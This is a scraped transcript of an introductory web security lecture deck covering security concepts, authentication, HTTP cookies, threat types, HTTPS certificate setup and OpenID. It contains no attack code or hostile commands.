Web Security Dr. Theodosis Mourouzis 8 Dec 2015 Web Security Lecture by Dr Theodosis Mourouzis (c)...
-
Upload
adela-lester -
Category
Documents
-
view
218 -
download
0
Transcript of Web Security Dr. Theodosis Mourouzis 8 Dec 2015 Web Security Lecture by Dr Theodosis Mourouzis (c)...
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
1
Web SecurityDr. Theodosis Mourouzis
8 Dec 2015
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
2
OUTLINE• Introduction to Security
• Historical Overview
• Authentication
• Web Architecture
• Threats Landscape
• Secure Online Communication
- Trusted Third Parties (TTP): Certification Authorities (CA)
- SSL/TLS Protocol
- OpenID
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
3
OUTLINE• Web Vulnerabilities
- Account (Username/Password ) Enumerations
- SQL Injections
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
• Remediation Measures
• PCI-DSS Compliance
• Risk Management Framework
• Conclusions
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
4
Instructor (Theodosis Mourouzis)Academia
• BSc in Mathematics (University of Cambridge)
• MSc in Mathematics (University of Cambridge)
• MRes in Security Science (University College London)
• PhD in Information Security & Cryptography (University College London)
• Several awards in national (CY) competitions in mathematics, physics, statistics and 3-times member of the Cyprus National Team participating International Mathematical Olympiads.
• Recipient of the UK University Cipher Champion 2013 award
Professional Experience
• Security Architect in a TSB funded project related to device-centric models
• Security SME at Digital Security & Fraud at Lloyds Banking Group
• Independent Consultant for Security and Analytics
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
5
Research Interests• Fraud Analytics
- Use Big Data and Analytics to detect/prevent fraud
- Cybersecurity threats’ detection
• Security Analysis of Cryptographic Primitives
- Security Analysis of systems used for confidentiality and integrity of data
- Russian Cryptography (GOST block cipher & hash function)
• Human and Device – centric models for authentication
- Passwords
- Multiple-factor authentication techniques
- Use the device as a token for authentication and biometrics involved
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
6
Motivational ExampleOnce Upon a Day … two friends, Alice and Bob, decided to start working on a fabulous start-up idea.
• The connected in a clever way all major online-stores and ensured goods at a very descent prices
• Their idea was involving storing (in a database) and processing (online) customers’ credit-card information
The Happy Side
• Customers found a lot of value in the idea and company’s website started gaining a lot of reputation.
• Huge traffic every week from all around the world !
• In a period of a year, they were processing credit-card data of about 100M users worldwide !
• The start-up was not a start-up anymore …but a reputable company with over 100 employees.
• All financial consultants were ensuring Alice (the CEO of the company) that her company is going to grow a lot in the coming years.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
7
Motivational ExampleThe Dark – Side
• Unfortunately, Bob (who became the CIO of the company) was neither security aware nor technology-driven
• He declined all financial decisions to enhance company’s online security and information security policy
• One rainy morning … a malicious hacker managed to penetrate into the online infrastructure of the company and exposed the database where customer’s credit card’s were stored
• The malicious hacker easily “unlocked” the password-protected database…which was protected with the password “BobCIO”
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
8
Motivational Example• The malicious hacker published the database online
• One of the biggest credit-card frauds has just started
• In a few minutes, all the money of about 100M users disappeared
Some really bad consequences for Alice and Bob…
• The media started reproducing this incident
• People started spoiling company’s reputation
• All credit-card major players declined to collaborate with this company anymore and sued the company for breaching the terms and conditions regarding information security compliance
• Financial and credit-card regulators penalised the company with huge fines
• The company eventually bankrupted and both CEO and CIO are facing jail penalties
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
9
Motivational ExampleWhat is the meaning of this example ?
What have you really learned from this?
Do you still think security is a science fiction thing?
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
10
Recent Breaches
Telecom company which provides pay TV and internet access Occurred: < 23 Oct 2015 150K TalkTalk customers affected 15,656 Bank Accounts hacked 4% of 4M customers affected Hacked twice last year Criticised for lack of information security
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
11
Recent Breaches
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
12
Recent BreachesLots of examples …
Confidential Data Breaches
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
13
Interesting Statistics
• 76% of U.S companies had a Cybersecurity incident within the past 12 months [Source: online.wsj.com]
• 71% of breaches in 2015 occurred in business with 100 employees or less [Source: Forbes]
• 80% of small business that Experience a data breach suffer serious financial losses [Source: sileo]
• 22% probability your company will experience a breach which compromises at least 10K records [Source: Dell]
• It takes 33-365 days for a company to detect or know its been breach !
• 70% of security incidents that cost enterprise money involves insiders
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
14
Food for thoughtBy the end of this lecture you need to ask yourself …
Do I understand the online threats involved to my business?
Do I really understand the potential impact of security to my business?
Do I know what can I do about it?
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
15
Introduction to Security
What is security ?
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
16
Introduction to Security
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
17
Introduction to Security[asset]: people, property and information.
• People may include employees and customers along with other invited persons such as contractors or guests.
• Property assets consist of both tangible and intangible items that can be assigned a value
• Intangible assets include reputation and proprietary information such as databases, software code, critical company records e.t.c
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
18
Introduction to Security[Information Security]
The practise of defending information from unauthorized
Access,
Use,
Disclosure,
Disruption,
Modification,
Inspection,
Recording,
Destruction,
etc …
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
19
Introduction to SecurityKey Concepts
Confidentiality
Integrity
Availability
(known as the CIA triangle)
Non-Repudiation
Authenticity
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
20
Introduction to Security[confidentiality]
• Preserving authorized restrictions on access and disclosure, including means for protecting personal privacy and proprietary information
• Only the authorized recipient is able to reveal the content of a message that is supposed to be confidential
• Set of rules that limits access and/or places restrictions on certain types of information
• Goes back to the beginning of the civilization – lots of techniques developed during wars
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
21
Introduction to Security[confidentiality]
Data Classification
• Restricted
- data protected by state or federal privacy regulations
• Private
- everything not classified as restricted or public
• Public
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
22
Introduction to Security[confidentiality]
Detailed Classification Levels
• Top Secret
• Secret
• Confidential
• Restricted
• Official
• Unclassified
• Clearance
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
23
Introduction to Security[Integrity]
• Protecting the content of a message from altering during transit either on purpose or accidentally
• Guarding against improper information modification or destruction,
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
24
Introduction to Security[availability]
• Ensure that the resources that you sell or buy are always available
• Ensure timely and reliable access to and use of information
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
25
Introduction to Security[Non-repudiation]
• The sender of the message cannot later deny that he did sent a message
- If you sign a cheque you cannot later deny
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
26
Introduction to Security[authenticity]
• Make sure that the one is the one supposed to be
• Trustfulness of origins
• Is the page I m visiting online the one supposed to be ?
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
27
Introduction to Security…and another one requirement which is more business oriented …
[continuity]: information should be continuously available to the business user and this is ensured thorough appropriate business continuity and disaster preparedness
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
28
Historical Overview
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
29
Historical Overview• Human desire to communicate secretly is at least as old as writing
itself
• This desire goes back to the beginnings of civilization
• Main goal was transmission of messages in the presence of unauthorized parties, especially during military operations
• Methods of secret communication were developed by many ancient societies
Hi BobBla, bla- Alice
Hi BobBla, bla- Alice
Alice Bob
Eve
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
30
Historical Overview• Many examples of attempts for secure communication
- Julius Caesar (100 BC)
-- simple transposition ciphers
- WWI: use of radio for exchanging messages
-- need for more secure techniques to prevent interception
- WWII: shift to electromagnetic rotor machines
-- Enigma machine by the Germans
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
31
Historical Overview• Julius Caesar (100 BC – 44 BC) – Roman Emperor
• He invented a technique to send messages in a form that was preventing unintended persons to read it
• Even his messenger was not capable of reading the messages
• The technique is known as Ceasar Cipher
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
32
Historical Overview• Message …
“ My spies must send me information regarding rivers, water, mountain coordinates and the time the guards are protecting the main gate”
• What an unintended recipient read…
“Pb vslhv pxvw vhqg ph lqirupdwlrq uhjduglqj ulyhuv, zdwhu, prxqwdlq frruglqdwhv dqg wkh wlph wkh jxdugv duh surwhfwlqj wkh pdlq jdwhrw wr eh, Wkdw lv wkh txhvwlrq”
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
33
Historical OverviewSecurity Evolved tremendously …
- Simple mathematical rules
-- Electro-magnetic rotor machines
--- Complex mathematical problems which are hard to be solved
(elliptic curves, integer factoring)
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
34
Security Evolved …
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
35
Historical Overview (Different Notions)Security though obscurity
• Use of secrecy of the design or implementation to provide security
• Designers of such systems believe that if the flaws are not known, then attackers will be unlikely to find them
• However, a system might have theoretical or actual security vulnerabilities
• Sometimes used as a defence in depth measure
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
36
Historical Overview(Different Notions)Open Security
• Security though obscurity is discouraged and not recommended by standard bodies
• National Institute of Standards and Technology (NIST) in US recommends against this practise “System security should not depend on the secrecy of the implementation or its components”
• Follow open source philosophies, methodologies and standards when implementing systems
37
Historical Overview(Different Notions)Advantages of Open Security
Compatible implementations
Scrutinized and analysed by prominent security experts
All major flaws and vulnerabilities would be revealed quickly
Security is collaboratively improved
Transparency
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (c
)
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
38
Risks – Treats - Vulnerabilities“An asset is what we are trying to protect”
[threat]: anything that can exploit a vulnerability, intentionally or accidentally, and obtain, damage or destroy an asset
“A threat is what we’re trying to protect against”
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
39
Risks – Treats - VulnerabilitiesNatural Threats: Floods, earthquakes, tornadoes, avalanches
Human Threats: Events that are either enabled by or caused by human beings, such as unintentional acts (inadvertent data entry) or deliberate actions (network based attacks, malicious software attack, unauthorized access to confidential information)
Environmental Threats: Long-term power failure, pollution, chemicals, liquid leakage
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
40
Risks – Treats - Vulnerabilities[vulnerability]: weakness or gaps in a security program that can be exploited by threats to gain unauthorized access to an asset
“A vulnerability is a weakness or gap in our protection efforts”
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
41
Risks – Threats - Vulnerabilities[risk]: the potential for loss, damage or destruction of an asset as a result of a threat exploiting a vulnerability
“Risk is the intersection of assets, threats and vulnerabilities”
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
42
Risks – Threats - VulnerabilitiesRISK Threats Vulnerabilities
Business disruption Angry employees Software bugs
Financial losses Dishonest employees Broken processes
Loss of privacy Criminals Ineffective controls
Damage to reputation Governments Hardware flaws
Loss of confidence Terrorists Business change
Legal penalties The press Legacy systems
Impaired growth Competitors Inadequate BCP
Loss of life Hackers Human error
Nature
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
43
Risks – Threats - VulnerabilitiesNIST threat-vulnerability pairings table:
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
44
Authentication
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
45
AuthenticationAuthentication (from Greek: αὐθεντικός ) is the method of confirming the truth of an attribute of a single piece of data claimed true by an entity. It is the process of confirming an identity.
Basic Concepts:
[identification]: declare who you are
{entity}[authentication]: prove it
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
46
AuthenticationAuthentication Factors
Something the user knows: password, partial password, pass-phrase, Personal Identification Number(PIN), security question
Something the user has: wrist band, ID card, security token, cell phone with built-in hardware token
Something the user is: fingerprint, retinal pattern, facial recognition, voice
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
47
AuthenticationMultiple-Factor Authentication: combining several [INDEPENDENT] authentication techniques together.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
48
Authentication• [Nowadays] 2-Factor-Authnetication (2FA) are used to protect money
(Internet Banking)
• Shift to 3-Factor quite soon
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
49
Authentication
Even though the authentication area is widely studied, security still relies on passwords
Password: string of characters used for certain authentication to prove identity or access approval to gain access to a resource
It MUST be as hard as possible for someone to guess it
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
50
Authentication• A lot of research focused on “password’s strength” formalization
• Many different metrics/policies to ensure strong passwords were introduced
• Password strength: likelihood that a password cannot be guessed and varies with the attack algorithm used
- too vague !
- more formal definitions based on entropy and randomness were introduced
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
51
Authentication• Policies to ensure strong passwords are very often introduced
• Security awareness campaigns to help people selecting stronger passwords
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
52
Authentication• However, at the end the selection is done by a HUMAN
• We cannot remember long, complex and random looking strings
• We tend to make selections that are easy to remember
• We tend to use same passwords across many different sites
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
53
AuthenticationA very “secure password” is expected to be like …
A=K2z!43&Z2~B_d4-o3@(5)!h6c7=x08H1
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
54
Authentication
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
55
Authentication
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
56
Security Design• We need systems that are both secure and usable … otherwise it
will lead to failure
• They often tend to be inversely related which implies complex engineering problems and a lot of thinking !
• Imagine a system in which you have to type a 30
characters password and you need to carry with you a security token ?
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
57
Authentication
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
58
AuthenticationPassword Policies
Password Complexity
- does not contain the name of the user, real name or company name
- at least 8 characters long
- It contains characters from three of the following 4 categories
-- Latin uppercase letters (A-Z)
-- Latin lowercase letters (a-z)
-- Base 10 digits (0-9)
-- Special characters (!,$,%,#)
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
59
AuthenticationPassword Policies
Password Expiration
- change passwords every some time (1-6 months)
Password Use
- avoid using same password for accessing multiple accounts
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
60
Web Architecture
A fair introduction
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
61
Web Architecture An approach to the design and planning of websites that involve
technical, aesthetic and functional criteria.
Focus on the user and on user requirements
- web content
- usability
- interaction design
- information architecture
- web design
- technology stack
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
62
Web Architecture What is a Web Application?
A web application or web service is a software application that is accessible using a web browser or HTTP(s) user agent.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
63
Web Architecture Client-Server Architecture (two-tier architecture)
A network architecture in which each computer/process on the network is either a client or a server
Servers are powerful computers or processes dedicated to managing disk drives, printers or network traffic.
Clients are PCs or workstations on which users run applications.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
64
Web Architecture
Example: Client needs to access for example Wikipedia or shopping websites like Amazon via his/her browser. The Web Server is responsible for serving the content requested by the user.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
65
Web Architecture
• Web Servers: Apache HTTP server, Microsoft ISS (Internet Information Services), Sun Java System Web Server
• Database: DB is a separate entity, logically (and often physically)
• Data: user data is a part of the browser
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
66
Web Architecture A client requested a content by URL (Universal Resource Location)
Protocol: http, ftp, tor , https
Address of the host: Translated to an IP address by DNS (e.g. 128.8.127.3)
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
67
Web Architecture Path to a resource
…./index.html (static content – fixed file returned by the server)
…/apple.php (dynamic content – the server generated the content on the fly)
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
68
Web Architecture HTTP (Hypertext Transfer Protocol) is the Internet Application Protocol used for communication (exchange of data) between client and server. It runs on top of TCP.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
69
Web Architecture • User Clicks on a website (HTTP Request on buttonClick)
Request contains:
The URL of the Resource, Headers describing what the browser can do
Request Types: GET (no server-side effects), POST (data sent to server – side-effects)
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
70
Web Architecture HTTP GET Requests
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
71
Web Architecture HTTP GET POSTS
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
72
Web Architecture A Response(after a Request) is sent and rendered to the browser
• Response contains:
- Status Code: e.g. 200 OK
- Headers describing what the server provides
- Data
- Cookies (represent state the server would like the browser on its behalf – maintain notion of session)
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
73
Web Architecture
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
74
Web Architecture COOKIES
• An HTTP cookie is a small piece of data sent from a website and stored in a user’s web browser while the user is browsing that website
• Every time the user loads the website, the browser sends the cookie back to the server to notify the website of the user’s previous activity
Applications
• Remember state-full information (e.g. items in shopping card)
• Record user’s browsing activing
• Third-party tacking cookies, used to compile long-term records of individuals browsing histories – PRIVACY CONCERN
- EU and US law makers took action in 2011 around this
• Storing information such as passwords or credit cards
• Authentication cookies: most common method used by web servers to know whether or not the user is logged in or not and which account. This helps webserver to ensure they send sensitive information to the legitimate users
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
75
Web Architecture COOKIES
• Cookie parameters are set in a Set-Cookie response header
HTTP/1.1 200 OKServer: Apache-Coyote/1.1Set-Cookie: domain=widget.com; path=/; secure; Account=766324Content-Type: text/htmlContent-Length: 327Date: Tue, 25 Sep 2007 14:15:51 GMT
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
76
Web Architecture COOKIES
COOKIE PARAMETERS
• expires=<date>: determines when cookie will be deleted
• domain=<domain name> : cookie will be returned to each domain that ends with this value
• path=<path name> : cookie will be returned only for requests that start with this path
• secure : if present, cookie will be returned only with HTTPS (secure HTTP) requests
• <name>=<value> : allow arbitrary data to be stored in a cookie
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
77
Threats Landscape
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
78
Threats LandscapeThe types of hackers
[Black Hat] A person who hacks into a computer network with malicious or criminal intent.
[Grey Hat] A person whose ethical standards fall somewhere between purely altruistic and purely malicious.
[White Hat] A person who hacks into a computer network in order to test or evaluate the security of the system.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
79
Threats LandscapeComputer System Threats come in many forms and in all sorts of shapes and sizes
• software attacks:
- virus, worms, malware, Trojan horse,
- phishing attacks
• intellectual property theft,
• identity theft,
• theft of equipment or information,
• sabotage,
• information extortion
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
80
Threats Landscape[Phishing Attack]
An attack that attempts to acquire sensitive information (such as usernames, passwords, and credit card details) often for malicious reasons by impersonating a trustworthy entity in an electronic communication.
It is usually the first step in an attack, like malware attack.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
81
Threats Landscape
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
82
Threats LandscapeRisk of Phishing grows in Social Media:
Hackers take advantage of Social Networks to attack people since people trust these networks and they may not be able to tell that the site being visited, or program being used, is not real.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
83
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
84
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
85
Threats Landscape
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
86
Threats Landscape[malware] short for “malicious software”, a software which is specifically designed to disrupt or damage a computer system or steal personal information or do unwanted actions on a computer system
Examples:
Viruses
Worms
Trojans
Spyware/Spyware
Source: PandaLabs Security
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
87
Threats Landscape
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
88
Threats Landscape
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
89
Threats Landscape[social engineering]
A non-technical method of attack that relies heavily on human interaction and often involves tricking people into breaking normal security procedures.
It is one of the greatest threats that organizations encounter today.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
90
Data Breaches
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
91
Secure Online Communication
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
92
Secure Online CommunicationSuppose that your information is transmitted over the network.
Then, anyone who can intercept the traffic can read all your details.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
93
Secure Online CommunicationThe solution is cryptography !
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
94
Secure Online Communication
But are you sure you are connected to the page you are supposed to connect?
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
95
Secure Online CommunicationA Trusted Third Party (TTP) is an entity which facilitates interactions between two parties who both trust the third party.
It is widely used in the electronic transfer of secure data
The TTP uses cryptography and other security measures to authenticate the identity of the sender, the security of the data during transmission and to verify delivery to the intended recipient.
Examples: banks, Certification Authorities (CA)
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
96
Secure Online Communication• We have SSL/TLS protocol which is responsible for securing data
traveling from the user’s PC to the server over the internet
• The primary goal is to provide privacy and data integrity between two communicating computer applications
1. The connection is private because all data are encrypted
2. The identity of communicating parties is authenticated and verified by a Third Party which is a recognized authority
3. Each message is guaranteed to arrive unchanged to the intended recipient
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
97
Secure Online CommunicationSetting up SSL (HTTPS) on your website
• If you collect ANY sensitive information (username, password) or involved in any financial transactions then you need to enable HTTPS
• Any information going to and from the server is automatically encrypted
• SSL prevents hackers from sniffing out your visitor’s sensitive information as it passed through the WEB
• Visitors feel more secure when the green lock appears as this means a security certificate is protecting the site
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
98
Secure Online CommunicationSetting up SSL (HTTPS) on your website
• If you try to write https://www.mywebsite.com it will not work right now
• You need to install an SSL certificate in the first place
• You can set it up in 5 simple steps
- Host with a dedicated IP address
- Buy a certificate
- Activate the certificate
- Install the certificate
- Update your site to use HTTPS
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
99
Secure Online CommunicationSetting up SSL (HTTPS) on your website
Step 1 [Host with a dedicated IP address]:
• Lots of smaller web hosting plans put you on a shared IP where multiple other websites are using the same location.
• With a dedicated IP you ensure that the traffic going to that IP address is only going to your website and no one else’s.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
100
Secure Online CommunicationSetting up SSL (HTTPS) on your website
Step 2 [Buy a Certificate]:
• Something that proves your website is your website (think of it like an ID card)
• When a user visits your site, the browser trusts the site by checking the certificate and everything is encrypted after the “handshake”
• You can create a “self-signed” one but it is not trusted by modern browsers
• Places to buy certificates
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
101
Secure Online CommunicationSetting up SSL (HTTPS) on your website
Step 3 [Activate the Certificate]:
• The host can possibly do this for you- check it
• Generate a Certificate Signing Request (CSR) within your hosting control panel – such as WHM or cPanel.
• Go to SSL/TLS admin area and choose “Generate an SSL certificate and Signing Request” and fill the form.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
102
Secure Online Communication
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
103
Secure Online Communication
• Copy the first block (since you need the CSR to give to the SSL cert issuer to establish your ID) and go to the vendor’s site where you bought the certificate and pass CSR and any other fields needed.
• It will ask you for an approval email. This email proves you own the domain i.e. [email protected]. You need to create it.
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
104
Secure Online CommunicationSetting up SSL (HTTPS) on your website
Step 4 [Install the certificate]:
• The host might do it for you
• If not, paste the certificate in your web host control panel. If you use WHM, Cpanel click “Install an SSL Certificate” under the SSL/TLS menu
• Paste it and submit
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
105
Secure Online CommunicationSetting up SSL (HTTPS) on your website
Step 5 [Update your site to use HTTPS]:
• Now https://www.mywebsite.com works
• However, you need to make sure they access your site through HTTPS
• You can enable it for all pages but you can also do it for a subset of them
Example of Apache Server configuration for redirection:
RewriteEngine On RewriteCond %{HTTPS} off RewriteRule ^(cart/|checkout/) https://%{HTTP_HOST}%{REQUEST_URI}
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
106
Secure Online CommunicationImportant Stuff
• HTTPS does not protect information on your server. It only protects TRANSFER of data from your visitor’s computer to yours.
• It is your obligation to make sure data is safe on your server
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
107
OpenID• OpenID is an open standard and decentralized protocol by the
non-profit OpenID foundation
• It allows users to be authenticated by certain co-operating sites, known as Relying Parties (RP) using a third party service
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
108
OpenID• The OpenID standard provides a framework for the communication
that must take place between the identity provider and the OpenID acceptor (RP)
• An extension to the standard, OpenID Attribute Exchange, facilitates securely the transfer of user attributes, such as name and gender, from the OpenID identity provider to the relying party
• This eliminates the need for webmasters to provide their own ad-hoc systems and allowing users to consolidate their “digital identities”
• Users can log into multiple unrelated websites without having to register with their information over and over again
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
109
OpenID
• Several large organizations either issue or accept OpenIDs on their website according to the OpenID foundation
- AOL, Blogger, France Telecom, Google, Microsoft, Yahoo! …
- Facebook stopped using OpenID and uses Facebook Connect
• Users create accounts by selecting an OpenID identity provided and then use those accounts to sign onto any website which accepts OpenID authentication
• You can rely on the security an OpenID provider which is assumed to be very secure
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
110
Web Security
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
111
Web SecurityWhat is Web Application Security ?
Simply, “The security of web applications”
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
112
Web Security
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
113
Web Security• End User Security and awareness programs reside in the policies,
procedures, and awareness layer of the Defense in Depth model
• User security awareness can affect every aspect of an organization’s security profile
• User awareness is a significant part of comprehensive security profile because many attack types rely on human intervention
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
114
Web Security
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
115
Web Security Common Web Application Security Mistakes
Web S
ecu
rity
Lect
ure
by D
r Theodosi
s M
ouro
uzi
s (
c)
116
Web Security• Trusting Client-Side Data
-- Do not TRUST client-side data!
-- Identify all input parameters that trust client-side data
